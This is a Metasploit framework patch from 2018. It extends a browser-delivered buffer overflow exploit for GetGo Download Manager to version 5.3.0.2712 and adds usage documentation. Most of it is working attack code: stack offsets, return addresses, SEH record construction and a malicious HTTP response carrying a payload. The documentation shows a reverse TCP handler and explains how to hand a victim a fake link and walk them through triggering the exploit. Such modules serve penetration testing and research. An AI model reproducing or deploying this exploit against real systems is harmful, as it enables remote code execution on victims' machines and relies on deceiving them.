From 7d04ebcf5f76c12817c014921224d8dd45d85a90 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Mon, 15 Oct 2018 15:47:35 -0500 Subject: [PATCH] Land #9642, support version 5 for GetGo Download Manager bof exploit --- .../browser/getgodm_http_response_bof.md | 30 ++++ .../browser/getgodm_http_response_bof.rb | 158 +++++++----------- 2 files changed, 87 insertions(+), 101 deletions(-) create mode 100644 documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md diff --git a/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md new file mode 100644 index 0000000000..afb22c8908 --- /dev/null +++ b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md @@ -0,0 +1,30 @@ +## Description + +This modules adds a buffer overflow exploit for GetGo Download Manager, which supports +4.9.0.1982 and 5.3.0.2712. Versions prior should also be vulnerable. + +This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded +at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe) + +To use this, first start the module like the following example: + +``` +msf5 exploit(windows/browser/getgodm_http_response_bof) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 192.168.0.12:4444 +msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3 +[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3 +[*] Server started. +``` + +The exploit should give you a fake link. Pass this link to the Getgo user, and instruct them to +do the following: + +1. Start GetGo Download Manager +2. Click on the DOWNLOAD button +3. Click on New (if the link is already copied to the clipboard, clicking on this should trigger + the download, and get exploited). +4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field, and + click OK. The user should also get exploited this way. diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb index dbac05a1ce..1795675aae 100644 --- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb +++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in - GetGo Download Manager version 4.9.0.1982 and earlier, caused by an + GetGo Download Manager version 5.3.0.2712 earlier, caused by an overly long HTTP response header. By persuading the victim to download a file from a malicious server, a @@ -26,7 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'Julien Ahrens', # Vulnerability discovery - 'Gabor Seljan' # Metasploit module + 'Gabor Seljan', # Metasploit module for v4 + 'bzyo', # Metasploit module for v5 + 'sinn3r' # Helping Gabor and bzyo (see #4588 & #9642) ], 'References' => [ @@ -42,16 +44,33 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Payload' => { - 'BadChars' => "\x00\x0a\x0d", - 'Space' => 2000 + # v5 has no bad chars + 'BadChars' => "\x00\x0a\x0d" }, 'Targets' => [ - [ 'Windows XP SP3', + [ + 'Automatic', {} + ], + [ '4.9.0.1982 on Windows XP SP3', { 'Offset' => 4107, 'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30] } + ], + [ + '5.3.0.2712 on Windows XP SP3', + { + 'Offset' => 4095, + # 0:016> u 0x72d11f39 + # msacm32!wodMessage+0xd0f: + # 72d11f39 5f pop edi + # 72d11f3a 5e pop esi + # 72d11f3b c20400 ret 4 + 'Ret' => 0x72d11f39, + # 12253 is the same size the python PoC used + 'MaxSize' => 12253 + } ] ], 'Privileged' => false, @@ -59,102 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0)) end - # - # Handle the HTTP request and return a response. - # Code borrowed from: msf/core/exploit/http/server.rb - # - def start_http(opts={}) - # Ensture all dependencies are present before initializing HTTP - use_zlib - - comm = datastore['ListenerComm'] - if (comm.to_s == "local") - comm = ::Rex::Socket::Comm::Local - else - comm = nil - end - - # Default the server host / port - opts = { - 'ServerHost' => datastore['SRVHOST'], - 'ServerPort' => datastore['HTTPPORT'], - 'Comm' => comm - }.update(opts) - - # Start a new HTTP server - @http_service = Rex::ServiceManager.start( - Rex::Proto::Http::Server, - opts['ServerPort'].to_i, - opts['ServerHost'], - datastore['SSL'], - { - 'Msf' => framework, - 'MsfExploit' => self - }, - opts['Comm'], - datastore['SSLCert'] - ) - - @http_service.server_name = datastore['HTTP::server_name'] - - # Default the procedure of the URI to on_request_uri if one isn't - # provided. - uopts = { - 'Proc' => Proc.new { |cli, req| - on_request_uri(cli, req) - }, - 'Path' => resource_uri - }.update(opts['Uri'] || {}) - - proto = (datastore["SSL"] ? "https" : "http") - print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}") - - if (opts['ServerHost'] == '0.0.0.0') - print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}") - end - - # Add path to resource - @service_path = uopts['Path'] - @http_service.add_resource(uopts['Path'], uopts) - - # As long as we have the http_service object, we will keep the server alive - while @http_service - select(nil, nil, nil, 1) - end - end - - - # - # Kill HTTP/FTP (shut them down and clear resources) - # - def cleanup - super - stop_service - - begin - @http_service.remove_resource(datastore['URIPATH']) - @http_service.deref - @http_service.stop - @http_service.close - @http_service = nil - rescue - end - end - - - def on_request_uri(cli, request) - - print_status("Client connected...") - - unless request['User-Agent'] =~ /GetGo Download Manager 4.0/ - print_error("Sending 404 for unknown user-agent") - send_not_found(cli) - return - end - - sploit = rand_text_alpha(target['Offset']) + # This part is from Gabor Seljan + def exploit_v4(cli, current_taget) + sploit = rand_text_alpha(current_taget['Offset']) sploit << "\x90\x90\xEB\x06" - sploit << [target.ret].pack('V') + sploit << [current_taget.ret].pack('V') sploit << payload.encoded print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...") @@ -162,8 +90,36 @@ class MetasploitModule < Msf::Exploit::Remote resp = create_response(200, sploit) resp.body = "" cli.send_response(resp) + end - close_client(cli) + # This part is from Auxilus with some help from @_sinn3r + def exploit_v5(cli, current_taget) + seh_record = generate_seh_record(current_taget.ret) + # Minus 4 for the SEH record + buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4) + buffer << seh_record + buffer << payload.encoded + buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length) + res = create_response(200, buffer) + cli.send_response(res) + end + def on_request_uri(cli, request) + print_status("#{cli.peerhost} connected") + current_target = target + user_agent = request.headers['User-Agent'].to_s + + if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/) + print_status('Attempting to exploit against v4') + current_target = targets[1] + exploit_v4(cli, current_target) + elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/) + print_status('Attempting to exploit against v5') + current_target = targets[2] + exploit_v5(cli, current_target) + else + print_error('Sending 404 for unknown user-agent') + send_not_found(cli) + end end end